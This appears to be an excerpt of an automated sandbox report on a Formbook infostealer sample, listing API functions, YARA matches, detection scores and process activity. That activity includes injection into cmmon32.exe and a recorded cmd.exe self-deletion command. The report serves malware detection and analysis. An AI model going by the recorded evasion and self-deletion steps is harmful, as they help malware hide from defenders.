          Source: 0000000B.00000002.914915179.00000000008A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_004181D0 NtCreateFile,2_2_004181D0
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_00418280 NtReadFile,2_2_00418280
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_00418300 NtClose,2_2_00418300
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_004183B0 NtAllocateVirtualMemory,2_2_004183B0
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_004183AB NtAllocateVirtualMemory,2_2_004183AB
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018799A0 NtCreateSection,LdrInitializeThunk,2_2_018799A0
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018795D0 NtClose,LdrInitializeThunk,2_2_018795D0
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01879910 NtAdjustPrivilegesToken,LdrInitializeThunk,2_2_01879910
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01879540 NtReadFile,LdrInitializeThunk,2_2_01879540
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018798F0 NtReadVirtualMemory,LdrInitializeThunk,2_2_018798F0
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01879840 NtDelayExecution,LdrInitializeThunk,2_2_01879840
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01879860 NtQuerySystemInformation,LdrInitializeThunk,2_2_01879860
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01879780 NtMapViewOfSection,LdrInitializeThunk,2_2_01879780
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018797A0 NtUnmapViewOfSection,LdrInitializeThunk,2_2_018797A0
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01879FE0 NtCreateMutant,LdrInitializeThunk,2_2_01879FE0
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01879710 NtQueryInformationToken,LdrInitializeThunk,2_2_01879710
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018796E0 NtFreeVirtualMemory,LdrInitializeThunk,2_2_018796E0
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01879A00 NtProtectVirtualMemory,LdrInitializeThunk,2_2_01879A00
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01879A20 NtResumeThread,LdrInitializeThunk,2_2_01879A20
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01879A50 NtCreateFile,LdrInitializeThunk,2_2_01879A50
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01879660 NtAllocateVirtualMemory,LdrInitializeThunk,2_2_01879660
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018799D0 NtCreateProcessEx,2_2_018799D0
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018795F0 NtQueryInformationFile,2_2_018795F0
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01879520 NtWaitForSingleObject,2_2_01879520
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_0187AD30 NtSetContextThread,2_2_0187AD30
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01879950 NtQueueApcThread,2_2_01879950
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01879560 NtWriteFile,2_2_01879560
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018798A0 NtWriteVirtualMemory,2_2_018798A0
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01879820 NtEnumerateKey,2_2_01879820
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_0187B040 NtSuspendThread,2_2_0187B040
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_0187A3B0 NtGetContextThread,2_2_0187A3B0
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01879B00 NtSetValueKey,2_2_01879B00
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_0187A710 NtOpenProcessToken,2_2_0187A710
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01879730 NtQueryVirtualMemory,2_2_01879730
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01879760 NtOpenProcess,2_2_01879760
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01879770 NtSetInformationFile,2_2_01879770
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_0187A770 NtOpenThread,2_2_0187A770
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01879A80 NtOpenDirectoryObject,2_2_01879A80
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018796D0 NtCreateKey,2_2_018796D0
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01879610 NtEnumerateValueKey,2_2_01879610
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01879A10 NtQuerySection,2_2_01879A10
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01879650 NtQueryValueKey,2_2_01879650
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01879670 NtQueryInformationProcess,2_2_01879670
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048795D0 NtClose,LdrInitializeThunk,11_2_048795D0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04879540 NtReadFile,LdrInitializeThunk,11_2_04879540
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048796D0 NtCreateKey,LdrInitializeThunk,11_2_048796D0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048796E0 NtFreeVirtualMemory,LdrInitializeThunk,11_2_048796E0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04879650 NtQueryValueKey,LdrInitializeThunk,11_2_04879650
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04879660 NtAllocateVirtualMemory,LdrInitializeThunk,11_2_04879660
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04879780 NtMapViewOfSection,LdrInitializeThunk,11_2_04879780
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04879FE0 NtCreateMutant,LdrInitializeThunk,11_2_04879FE0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04879710 NtQueryInformationToken,LdrInitializeThunk,11_2_04879710
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04879840 NtDelayExecution,LdrInitializeThunk,11_2_04879840
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04879860 NtQuerySystemInformation,LdrInitializeThunk,11_2_04879860
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048799A0 NtCreateSection,LdrInitializeThunk,11_2_048799A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04879910 NtAdjustPrivilegesToken,LdrInitializeThunk,11_2_04879910
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04879A50 NtCreateFile,LdrInitializeThunk,11_2_04879A50
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048795F0 NtQueryInformationFile,11_2_048795F0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04879520 NtWaitForSingleObject,11_2_04879520
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0487AD30 NtSetContextThread,11_2_0487AD30
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04879560 NtWriteFile,11_2_04879560
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04879610 NtEnumerateValueKey,11_2_04879610
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04879670 NtQueryInformationProcess,11_2_04879670
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048797A0 NtUnmapViewOfSection,11_2_048797A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0487A710 NtOpenProcessToken,11_2_0487A710
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04879730 NtQueryVirtualMemory,11_2_04879730
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04879760 NtOpenProcess,11_2_04879760
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0487A770 NtOpenThread,11_2_0487A770
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04879770 NtSetInformationFile,11_2_04879770
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048798A0 NtWriteVirtualMemory,11_2_048798A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048798F0 NtReadVirtualMemory,11_2_048798F0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04879820 NtEnumerateKey,11_2_04879820
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0487B040 NtSuspendThread,11_2_0487B040
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048799D0 NtCreateProcessEx,11_2_048799D0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04879950 NtQueueApcThread,11_2_04879950
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04879A80 NtOpenDirectoryObject,11_2_04879A80
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04879A00 NtProtectVirtualMemory,11_2_04879A00
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04879A10 NtQuerySection,11_2_04879A10
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04879A20 NtResumeThread,11_2_04879A20
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0487A3B0 NtGetContextThread,11_2_0487A3B0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04879B00 NtSetValueKey,11_2_04879B00
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_008B81D0 NtCreateFile,11_2_008B81D0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_008B8280 NtReadFile,11_2_008B8280
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_008B83B0 NtAllocateVirtualMemory,11_2_008B83B0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_008B8300 NtClose,11_2_008B8300
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_008B83AB NtAllocateVirtualMemory,11_2_008B83AB
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 0_2_00304C250_2_00304C25
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 0_2_002F9B350_2_002F9B35
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_002F9B352_2_002F9B35
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_004010272_2_00401027
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_004010302_2_00401030
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_00408C6D2_2_00408C6D
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_00408C702_2_00408C70
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_0041C4972_2_0041C497
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_0041B4B32_2_0041B4B3
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_0041C5062_2_0041C506
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_00402D872_2_00402D87
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_00402D902_2_00402D90
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_0041BE702_2_0041BE70
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_0041BE002_2_0041BE00
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_0041C7712_2_0041C771
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_0041BF092_2_0041BF09
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_00402FB02_2_00402FB0
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018625812_2_01862581
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_019025DD2_2_019025DD
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_0184D5E02_2_0184D5E0
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_0183F9002_2_0183F900
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01902D072_2_01902D07
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01830D202_2_01830D20
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018541202_2_01854120
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01901D552_2_01901D55
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_0184B0902_2_0184B090
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018620A02_2_018620A0
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_019020A82_2_019020A8
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_019028EC2_2_019028EC
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018F10022_2_018F1002
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_0184841F2_2_0184841F
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_0186EBB02_2_0186EBB0
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_018FDBD22_2_018FDBD2
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01901FF12_2_01901FF1
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01902B282_2_01902B28
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_019022AE2_2_019022AE
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01902EF72_2_01902EF7
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: 2_2_01856E302_2_01856E30
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0484841F11_2_0484841F
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048FD46611_2_048FD466
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0486258111_2_04862581
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_049025DD11_2_049025DD
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0484D5E011_2_0484D5E0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04902D0711_2_04902D07
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04830D2011_2_04830D20
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04901D5511_2_04901D55
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04902EF711_2_04902EF7
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04856E3011_2_04856E30
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04901FF111_2_04901FF1
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0484B09011_2_0484B090
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048620A011_2_048620A0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_049020A811_2_049020A8
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_049028EC11_2_049028EC
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048F100211_2_048F1002
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0483F90011_2_0483F900
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0485412011_2_04854120
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_049022AE11_2_049022AE
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0486EBB011_2_0486EBB0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_048FDBD211_2_048FDBD2
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_04902B2811_2_04902B28
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_008BC49711_2_008BC497
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_008BB4B311_2_008BB4B3
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_008A8C6D11_2_008A8C6D
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_008A8C7011_2_008A8C70
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_008A2D8711_2_008A2D87
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_008A2D9011_2_008A2D90
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_008BC50611_2_008BC506
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_008BBEF911_2_008BBEF9
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_008BBE0011_2_008BBE00
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_008A2FB011_2_008A2FB0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_008BC77111_2_008BC771
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: String function: 0183B150 appears 35 times
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: String function: 002F17D0 appears 46 times
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeCode function: String function: 002F4F91 appears 36 times
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: String function: 0483B150 appears 35 times
          Source: mvui1vY6Mo.exe, 00000000.00000003.651762525.00000000031C6000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs mvui1vY6Mo.exe
          Source: mvui1vY6Mo.exe, 00000002.00000002.746750846.0000000003899000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameCMMON32.exe` vs mvui1vY6Mo.exe
          Source: mvui1vY6Mo.exe, 00000002.00000002.745559030.000000000192F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs mvui1vY6Mo.exe
          Source: mvui1vY6Mo.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 2.2.mvui1vY6Mo.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.mvui1vY6Mo.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.mvui1vY6Mo.exe.2eb0000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.mvui1vY6Mo.exe.2eb0000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.mvui1vY6Mo.exe.2eb0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.mvui1vY6Mo.exe.2eb0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.mvui1vY6Mo.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.mvui1vY6Mo.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.915140274.0000000000B70000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.915140274.0000000000B70000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.745894672.0000000001B70000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.745894672.0000000001B70000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.915098041.0000000000B10000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.915098041.0000000000B10000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.660274297.0000000002EB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.660274297.0000000002EB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.745860975.0000000001B40000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.745860975.0000000001B40000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.744663875.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.744663875.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.914915179.00000000008A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.914915179.00000000008A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@8/0@7/5
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6400:120:WilError_01
          Source: mvui1vY6Mo.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: mvui1vY6Mo.exeVirustotal: Detection: 58%
          Source: mvui1vY6Mo.exeReversingLabs: Detection: 60%
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeFile read: C:\Users\user\Desktop\mvui1vY6Mo.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\mvui1vY6Mo.exe 'C:\Users\user\Desktop\mvui1vY6Mo.exe'
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeProcess created: C:\Users\user\Desktop\mvui1vY6Mo.exe 'C:\Users\user\Desktop\mvui1vY6Mo.exe'
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeProcess created: C:\Windows\SysWOW64\cmmon32.exe C:\Windows\SysWOW64\cmmon32.exe
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\mvui1vY6Mo.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeProcess created: C:\Users\user\Desktop\mvui1vY6Mo.exe 'C:\Users\user\Desktop\mvui1vY6Mo.exe' Jump to behavior
          Source: C:\Users\user\Desktop\mvui1vY6Mo.exeProcess created: C:\Windows\SysWOW64\cmmon32.exe C:\Windows\SysWOW64\cmmon32.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\mvui1vY6Mo.exe'Jump to behavior
          Source: mvui1vY6Mo.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
          Source: mvui1vY6Mo.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
          Source: mvui1vY6Mo.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
          Source: mvui1vY6Mo.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
